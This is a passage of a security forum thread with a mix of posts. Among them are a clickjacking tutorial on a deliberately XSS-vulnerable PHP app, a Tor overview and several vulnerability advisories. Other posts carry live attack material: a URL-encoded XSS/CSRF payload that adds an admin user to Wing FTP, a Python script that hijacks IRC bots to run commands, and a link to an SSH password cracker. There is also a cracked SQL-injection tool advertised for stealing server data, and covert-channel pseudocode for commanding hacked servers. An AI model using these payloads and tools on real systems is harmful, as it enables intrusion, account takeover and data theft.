a folder called “sample” inside my root directory. Application functionality: After setting up the sample application, launch the home page as shown below. http://localhost/sample/index.php As we can see in the above figure, this application has got a very simple login page where the user can enter his credentials. It has got basic server side validations as explained below. The user input fields cannot be empty. This is done using PHP’s empty() function. So, if a user doesn’t enter anything and clicks login, it throws a message as shown below. If the user enters wrong credentials, it throws a message as shown below. This is done after performing a check against user database. If the user enters correct username and password, it goes ahead and shows the home page for the user logged in. This is done using the MySQLi prepared statement as shown below. $stmt = $mysqli->prepare("select * from admin where username=? and password=?"); $stmt->bind_param("ss",$username,$password); $stmt->execute(); username: admin password: 1q2w3e4r5t Note: Please keep in mind that the given password is stored as SHA1 hash in this sample database. This is a common password and this SHA1 hash can be easily be cracked using some online tools. After logging in, a session is created for the user, and there is a simple form which is vulnerable to XSS. Now, let us fire up BurpSuite and just keep a note of the default headers that are set when we login to this application. This looks as shown below. HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 13:59:23 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=17807aed72952730fd48c35ac8e58f9c; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you clearly observe the above headers, there are no headers added to provide additional security to this application. We can also see the search field after logging in, which is accepting user input and echoing back to the user. Below is the code used to build the page being displayed after login. <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Clickjacking prevention using X-Frame-Options header: The first concept that we will discuss is Clickjacking mitigation using X-Frame-Options. How does it work? Usually, an attacker loads a vulnerable page into an iframe to perform clickjacking attacks. In our case, we are going to load the user dashboard page into an iframe as shown below. This page appears after successful login. http://localhost/sample/home.php <!DOCTYPE html> <html> <head> <title>iframe</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> </head> <body> <iframe src="http://localhost/sample/home.php"></iframe> </body> </html> I saved this page as iframe.html on the same server. When we load this in a browser, the above URL will be loaded in an iframe as shown below. Though there are multiple ways to prevent this, we are going to discuss the X-Frame-Options header to keep the content of this article inline with the title. The X-Frame-Options header can be used with the following three values: DENY: Denies any resource from framing the target. SAMEORIGIN: Allows only resources that are part of the Same Origin Policy to frame the protected resource. ALLOW-FROM: Allows a single serialized-origin to frame the protected resource. This works only with Internet Explorer and Firefox. We will discuss each of these options in detail. X-Frame-Options: DENY Let us start with “X-Frame-Options: DENY”. Open up your home.php file and add the following line. header(“X-Frame-Options: DENY”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: DENY"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP headers from the server after adding X-Frame-options header with the value DENY: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:14:51 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=9190740c224f78bb78998ff40e5247f3; path=/ X-Frame-Options: DENY Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If you notice, there is an extra header added in the response from the server. If we reload the iframe now, the URL will not be loaded inside the iframe. This looks as shown below. Let us see the reason behind this by navigating to Chrome’s developer tools using the following path. Customize and Control Google Chrome -> More Tools -> Developer Tools\ As we can see in the above figure, this is because of the header we set in the server response. We can check the same in Firefox by using the Web Developer Extension as shown below. If we load the iframe.html page in Firefox, below is the error being displayed in the console. X-Frame-Options: SAMEORIGIN There may be scenarios where framing of this URL is required for this application. In such cases, we can allow framing from the same origin and prevent it from cross origin requests using the value “SAMEORIGIN” with X-Frame-Options header.\ Open up your home.php file and add the following line. header(“X-Frame-Options: sameorigin”);\ Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: sameorigin"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Logout from the application and re-login to observe the HTTP headers now. Below are the HTTP Headers from the server after adding X-Frame-options header with the value sameorigin: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:34:52 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=5f3d66b05f57d67c3c14158621dbba9e; path=/ X-Frame-Options: sameorigin Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Now, let us see how it works with different origins. First let us load the same iframe.html, which is hosted on the same server. As we can see in the figure below, we are able to load the page in the iframe without any problem. Now, I launched Kali Linux using Virtual Box and loaded this URL(http://localhost/sample/home.php)and placed the file on the server, which is a different origin for our current application. Below is the code snippet used on the Kali Linux machine to create iframe.html. When we launch this iframe.html file, it will not load due to the cross origin restriction by the server. We can see that in the error console of iceweasel browser in Kali Linux as shown below. The error clearly shows that the server does not allow cross-origin framing. X-Frame-Options: ALLOW-FROM http://www.site.com X-Frame-Options: ALLOW_FROM option allows a single serialized-origin to frame the target resource. This works only with Internet Explorer and Firefox. Let us see how this works. First, open up your home.php file and add the following line. header(“X-Frame-Options: ALLOW-FROM http://localhost”); Now the modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://localhost"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Let us logout from the application and re-login to check if the header is added. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:18:49 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a5b9a76982ae38f0dde3f3bf3480f5; path=/ X-Frame-Options: ALLOW-FROM http://localhost Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 As we can see, the new header is added now. If we now try to load the iframe from the same server, it loads the page without any problem, as shown below. This is because http://localhost is allowed to load this URL. Now, let us try to change the header to something else and try reloading it again. Add the following line in home.php and observe the difference. header(“X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com”); The modified code should look as shown below. <?php session_start(); session_regenerate_id(); header("X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Following are the headers captured from BurpSuite. HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 02:20:26 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=6a8686e1ab466a6c528d8a49a281c74e; path=/ X-Frame-Options: ALLOW-FROM http://www.androidpentesting.com Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 If we now refresh our previous link, it will not load the page in an iframe. If we observe the error console, it shows the following error. It is obvious that framing by http://localhost is not permitted. Conclusion In this article, we have seen the functionality of our vulnerable application and fixed the clickjacking vulnerability using X-Frame-Options header. We have also seen various options available with this header and how they differ from each other. The next article gives coverage of other security headers available. Source
  10. Introduction When it comes to anonymizing activities in digital world, it can be referred to in various ways. Researchers might take it to identify various malicious activities and for back trailing, whereas hackers can anonymize their activities so as to build up a cover around their malicious activities. These anonymizing activities can really increase the work of researchers, as they can’t trust the attributes mentioned in the logs like IP address, user agent, etc. as such attributes will only give you false information. In this article series, we will learn about anonymizing activities from very basic level to an advanced level. Anonymity with TOR The Onion Router, widely known as TOR, is famous for staying anonymous on the Internet. Tor is a network of computers around the world that forward requests in an encrypted manner from the start of the request until it reaches the last machine in the network, which is known as an exit node. From the last node the TOR network, the request is decrypted and sent to the destination server. Thus exit nodes are the first nodes and last nodes in the TOR network for receiving and sending traffic from and to the original and destination server. Thus, to the destination server all traffic seems to come from the exit node in the TOR network, thus hiding the IP address of the original sender. Even the other systems in the TOR network cannot determine location either, because they are essentially forwarding traffic with no knowledge of where it actually originated. The responses to original requests will return to the system, but as far as the TOR network is concerned, a request is just another hop along the way. SOCKS server TOR works with the SOCKS protocol, so it is worth talking about SOCKS. A SOCKS server establishes a proxy TCP connection with another server on behalf of the client and then routes all the traffic back and forth between the client and the server. It works for any kind of network protocol on any port. SOCKS Version 5 adds additional support for security and UDP. The SOCKS server does not interpret the network traffic between client and server in any way, and is often used because clients are behind a firewall and are not permitted to establish TCP connections to servers outside the firewall unless they do it through the SOCKS server. Most web browsers for example can be configured to talk to a web server via a SOCKS server. Because the client must first make a connection to the SOCKS server and communicate which host it wants to connect to, the client must be “SOCKS enabled”. SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make, and then acts as transparently as possible, whereas a regular proxy may interpret and rewrite headers. Comparison of SOCKS and HTTP As can be inferred from the above text about SOCKS, its function is similar to that of HTTP. But there is a significant difference between SOCKS and HTTP, as SOCKS operates at one level lower than HTTP proxying. HTTP allows forwarding TCP connections, whereas SOCKS can also forward UDP traffic and work in reverse. Let’s understand the difference with an example: SOCKS: Suppose User ‘A’ wants to connect with User ‘B’ over the Internet, but a firewall between them is restricting users to connect with each other. User ‘A’ connects to a SOCKS proxy in his network, which opens a connection through the firewall, and a communication channel between User ‘A’ and ‘B’ is achieved. HTTP: Suppose User ‘A’ wants to download a web page from web server ‘B’, but because of presence of a firewall between them, User ‘A’ is not able to do so, so User ‘A’ connects to an HTTP proxy, and in turn A’s browser communicates with the proxy in exactly the same way that it would directly with B’s server if that was possible, meaning it sends a standard HTTP request header. The HTTP proxy connects to B’s server, and then transmits back to ‘A’ any data that B’s server returns. TOR hidden services TOR is also being used to hide websites and other servers. This works by using what is called an associated onion address rather the website’s original IP address. This model is more secure than the original TOR model traffic, since hidden services do not use exit nodes. Communication is encrypted end to end. Below are some of the TOR hidden services. Search Engines: TorSearch P2P file sharing: The Pirate Bay Social Media: Facebook Commerce: Evolution, Silk Road etc. TOR weaknesses Although TOR is a strong way to anonymize activities in digital world, the TOR network has some weakness too. Below are some of the weakness that the TOR network has: The TOR network is subject to eavesdropping attack. Since the TOR model involves exit nodes and traffic from exit node to destination node is not encrypted, eavesdropping attacks are possible. One possible solution to this is to always access the HTTPS version of service. TOR exit node block: Some of the websites block traffic if the last node is a TOR node, thus reducing the functionalities for TOR users. TOR is also vulnerable to traffic analysis attack, correlation attack, sniper attack, etc. TOR configuration TOR can be easily installed in the system and after connecting with the TOR network, user can anonymize his activities. Consider the following commands to use in Ubuntu. Install TOR as root: apt-get install tor Check for IP address of the system without TOR Install TOR bundle from TOR website Extract the content and run the .exe If you are running as root, then the system might display an error by saying that “TOR cannot be run as root”. To overcome this, open the file in a text editor and comment the following lines: After this start, the TOR bundle .exe and notice the IP address. The IP address should not be the same as your machine’s IP. So in this article, we have learnt about what is TOR, how it is different from HTTP, and how easy it is to install and configure TOR in a machine. In the next article, we will learn about some more ways of anonymizing. References http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29 Source
  11. Document Title: =============== Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: ============= 2015-04-28 apparitionsec ID (AS-ID): ==================================== AS-WFTP0328 Common Vulnerability Scoring System: ==================================== Overall CVSS Score 8.9 Product: =============================== Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: ============================== Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: ================================== March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new patched version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): ==================== Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): ======================= The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. POC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Payload(s) Add arbitrary user to the system: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain= POC XSS: http://localhost:5466/admin_event_list.html?type= Solution - Fix & Patch: ======================= Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: ============== The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: ================== John Page ( hyp3rlinx ) - ISR godz @Apparitionsec Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org Source: http://dl.packetstormsecurity.net/1504-exploits/AS-WFTP0328.txt
  12. Microsoft offers the Remote Desktop Protocol (RDP) in Windows to allow remote desktop connections, and while most versions of Windows include a RDP client, only the Professional, Ultimate and Server editions offer the RDP server to accept incoming connections. Unlike server editions of Windows, Microsoft limits the client editions of Windows to one concurrent user, whether remote or local. So if a remote desktop connection is made, no one physically at the PC can use it or even see the desktop without first kicking off the remote user. Today i am going to show you How to Enable Concurrent Remote Desktop Sessions in Windows server 2012 r2 Files description: RDPWInst.exe RDP Wrapper Library installer/uninstaller RDPCheck.exe Local RDP Checker (you can check the RDP is working) RDPConf.exe RDP Wrapper Configuration install.bat Quick install batch file uninstall.bat Quick uninstall batch file https://github.com/binarymaster/rdpwrap/releases
  13. Salut.Cum as putea sa uploadez un fisier pe un server ftp folosing un program in c++? Am incercat asta...dar am gresit pe undeva...dupa ce se conecteaza la server ftp, nu isi ia username-ul scris pe randul urmator, ci asteapta sa scriu eu unul de la tastatura #include <iostream> #include<windows.h> using namespace std; int main() { system("ftp ftp.*******"); system("username"); system("pass"); system("bin"); system("put test.txt"); }
  14. EN: This is a php script that uses a pre-defined set of possible passwords and tries them against a given ssh server. RO: Acesta este un script php care foloseste un set predefinit de posibile parole ?i le încearc? impotriva unui server ssh dat P.S dac? e am s? il testez ?i am s? revin cu mai multe informa?ii despre el. Download: Download: T35T-SSH Password Cracker / Scanner ? Packet Storm
  15. 3 Jelly Host , Free Unlimited Space Disk , Free VPS Hosting , Free Domain Name .com , .net , .org , Unlimited Bandwidth , Free Email Addresses , Free Ftp , Free Databases , Free Domain From 3 Jelly
  16. Primit acum cateva momente de la compania de hosting: A recent exploit (CVE-2015-1635) affecting IIS was released yesterday. The exploit is a Denial of Service (DoS) vulnerability in the HTTP.sys. Versions of Windows that are vulnerable: Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any version of IIS running on one of these operating systems. A patch was released on Tuesday April 14th as part of Microsoft's Patch Tuesday, we recommend that you patch your IIS affected servers as soon as possible to avoid any potential DoS exploits. More detailed information of the vulnerability can be found here https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583
  17. Am cautat si tot cautat pe internet dar nu gasesc detalii si explicatii clare.Vreau sa lucrez la un server mail si intrebarea mea e de unde sa incep ? In mintea mea stau lucrarule cam asa : Website-ul propriu-zis unde userul isi face cont si primeste adresa de email -> socket sau ceva de genu -> server mail.Pentru serverul de mail cum ii atribui domeniul ca userul inregistrat sa aiba adresa de email user@domeniul.tld si cum se inregistreaza un email pe serverul propriu? Ce limbaj de programare ar fi mai indicat C# / C++ ?
  18. # thehunter.py # Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution # author: @shipcod3 # description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def usage(): print("USAGE: python thehunter.py nick \n") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot server = "us.dal.net" #irc server channel = "#buhaypirata" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 6667)) #connects to the server irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv) Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt
  19. ------------------------------------------------------------------------ Product: Palo Alto Traps Server (formerly Cyvera Endpoint Protection) Vendor: Palo Alto Networks Vulnerable Version(s): 3.1.2.1546 Tested Version: 3.1.2.1546 Advisory Publication: 29 March 2015 Vendor Notification: 17 October 2014 Vulnerability Type: Stored Cross Site Scripting CVE Reference: CVE-2015-2223 Risk Level: High Solution Status: Discovered and Provided: Michael Hendrickx, help AG ------------------------------------------------------------------------ About the product: Palo Alto Traps is an advanced endpoint protection suite that detects attacks such as memory corruption, executable child processes, DLL hijacking, etc. Aside from optionally blocking it, it sends this ?trap? to a central server for logging purposes. About the vulnerability: An attacker can send a SOAP request with JavaScript embedded inside it, which gets stored in the database. When an administrator monitors the Traps? admin screen and opens details about the vulnerability, the JavaScript is executed on the admin browser. The XSS works in the <b:Arguments>, <b:FileName> and <b:URL> parameters, for example: <b:Arguments>"C:\\Users\\Michael\\fake.exe" <script> alert("xss"); </script> </b:Arguments> A POC script can be found at the following URL: https://github.com/ndrix/random-scripts/blob/master/pa_traps_xss.rb ------------------------------------------------------------------------ Solution: The vendor was notified back in October 2014, and a we?ve sent a few follow ups since. Contact the vendor for the patch details. References: [1] help AG middle East: http://www.helpag.com/ [2] Palo Alto Traps: https://www.paloaltonetworks.com/products/endpoint-security.html ------------------------------------------------------------------------ Source: http://dl.packetstormsecurity.net/1503-exploits/pats-xss.txt
  20. Affected software: Appweb Web Server CVE ID: CVE-2014-9708 Description: An HTTP request with a Range header of the form "Range: x=," (ie. with an empty range value) will cause a null pointer dereference, leading to a remotely-triggerable DoS. Fixed versions: 4.6.6, 5.2.1 Bug entry: https://github.com/embedthis/appweb/issues/413 Fix: https://github.com/embedthis/appweb/commit/7e6a925f5e86a19a7934a94bbd6959101d0b84eb#diff-7ca4d62c70220e0e226e7beac90c95d9L17348 Reported by: Matthew Daley - Matthew Daley Source: http://dl.packetstormsecurity.net/1503-exploits/appweb-dos.txt
  21. Step # 1 : Stop MySQL service # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld. Step # 2: Start to MySQL server w/o password: # mysqld_safe --skip-grant-tables & Output: [1] 5988 Starting mysqld daemon with databases from /var/lib/mysql mysqld_safe[6025]: started Step # 3: Connect to MySQL server using mysql client: # mysql -u root Output: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 to server version:4.1.15-Debian_1-log Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> Step # 4: Setup new MySQL root user password mysql> use mysql; mysql> update user set password=PASSWORD("new_passwd") where User='root'; mysql> flush privileges; mysql> quit Step # 5: Stop MySQL Server: # /etc/init.d/mysql stop Output: Stopping MySQL database server: mysqld STOPPING server from pid file /var/run/mysqld/mysqld.pid mysqld_safe[6186]: ended [1]+ Done mysqld_safe--skip-grant-tables Step # 6: Start MySQL server and test it /etc/init.d/mysql start mysql -u root -p Credit's to: razvan1@hy
  22. Its the succsessor to havij. Its better faster and more secure. Its the best tool i could find. Licence key is included in rar. You can steal data from servers with this tool Download: https://mega.co.nz/#!Ek90QSyI!p6zSz0tIhD2cfj889AAzrOI8HAnTl61QsAAOw8-pQNI
  23. The Packet Let's look at the packet. That's the thing that makes the internet work, lots of data goes on those, anywhere from 20bytes to 65335 bytes. However, in practice packets are usually around 600 bytes in size. That data stores a lot of info; some is redundant, some is needed, and some is 0'd out. There's a header, a body, extra space, and then error check and footer. It's actually kind of easy to end up with a couple screwed up bits in a packet (obviously not every packet is screwed up, but its not 1 out of every million either). Changing a little bit of the Packet What packet steganography is about is changing a couple of bits over a couple of packets. Similar to image steganography, it's almost impossible to detect (in small quantities) (assuming feds are downloading all the data) as packets are not known to all be made equally. I'm going to quickly give an example. Game A wants to send packet [00010101010001000010101010...000010101011000101...] to Game Server 3. However, you can copy that packet and then resend a slightly modified one, which will look like: [00010101010001000010101010...111110101001001000...] Since a massive amount of data is constantly being sent back and forth from the server to you, the packets can be modified a decent amount so information is carried, but one doesn't have to break the checksum by modifying too many bytes. Multiply 40 bits over a couple thousand packets, and a decent amount of data can be sent covertly from you to the server. What's the best part of this? If you hack servers that get a lot of traffic, it's almost impossible to tell who sent what modded packets to the server even if all of the data is logged because every single packet appears to be legitimate. While there is a decent amount of modded data transferred you can't just go and start downloading ripped movies with this. The point of packet steganography isn't to anonymize your downloads, but to send little messages over networks that won't be found by normal means. Obviously, if person A tries to send messages to person B, A won't send them directly. Instead, he could keep them in an encrypted part of a server. When person B wants to see the message, he unlocks the message by passing the correct key. Psuedocode example using MS Maplestory packets are nice, because they used to be pretty obvious as to what was going on. After the packet header the data of A)what action you were doing and (if a message) what the message was. The message was in plaintext hexidecimal format. Using the code below, we are going to edit a little character of every single message. To anyone looking at the packet it still appears to be a normal message, just with a small typing error. However, to the server and to you, the message really is no longer a message anymore. It's a specific set of instructions. The first couple of whispers to some random person validates to the server that you are the IP to grab the packets from. The final whisper (or packet) the server sees is a specific command to the server. It could be wipe the program on it, it could be tell these servers to do x, y, and z, or it could just be telling the server that there is going to be a new pattern to look out for, and at what certain time. Code for your side: public Whatever{ //obviously it depends for whatever server you hacked into, and what app communicates with the server, but for now lets pretend we hacked into a maplestory server //cool thing about MS is that the packets are pretty easy to understand //yes I realize I am turning Java into a scripting language below, but w/e public void initContact{ for(int i=0; i<10; i++){ String x=scan.grabPacket(); x=x.substring(0,12)+Integer.toHexString(i)+Integer.toHexString(i)+x.substri?ng(14,x.length()); XClass.sendPacket(x); //totally possible if string x winds up being a valid packet, which it is since it's just hex //obviously you have to make a sendPacket method if(scan.nextPacket.equals(neededPacket) XClass.sendPacket(endPacket(Action, Type, IP, Add_Instruct) else System.out.println("Connection was unable to be made"); } } public String endPacket(String x1, String x2, 